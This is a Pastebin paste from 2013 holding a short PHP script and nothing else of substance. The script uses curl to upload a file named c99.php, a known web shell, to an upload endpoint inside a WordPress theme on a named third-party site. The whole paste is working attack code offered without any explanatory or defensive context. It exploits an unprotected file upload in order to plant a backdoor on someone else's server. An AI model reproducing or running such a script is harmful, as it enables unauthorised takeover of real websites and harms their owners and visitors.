Advertisement
blogfakessh

Untitled

Aug 14th, 2013
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. <?php
  2.  
  3. $uploadfile="c99.php";
  4. $ch =
  5. curl_init("http://vitesse.md/wp-content/themes/Emporium/upload/upload.php");
  6. curl_setopt($ch, CURLOPT_POST, true);
  7. curl_setopt($ch, CURLOPT_POSTFIELDS,
  8. array('myfile'=>"@$uploadfile"));
  9. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  10. $postResult = curl_exec($ch);
  11. curl_close($ch);
  12. print "$postResult";
  13.  
  14. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement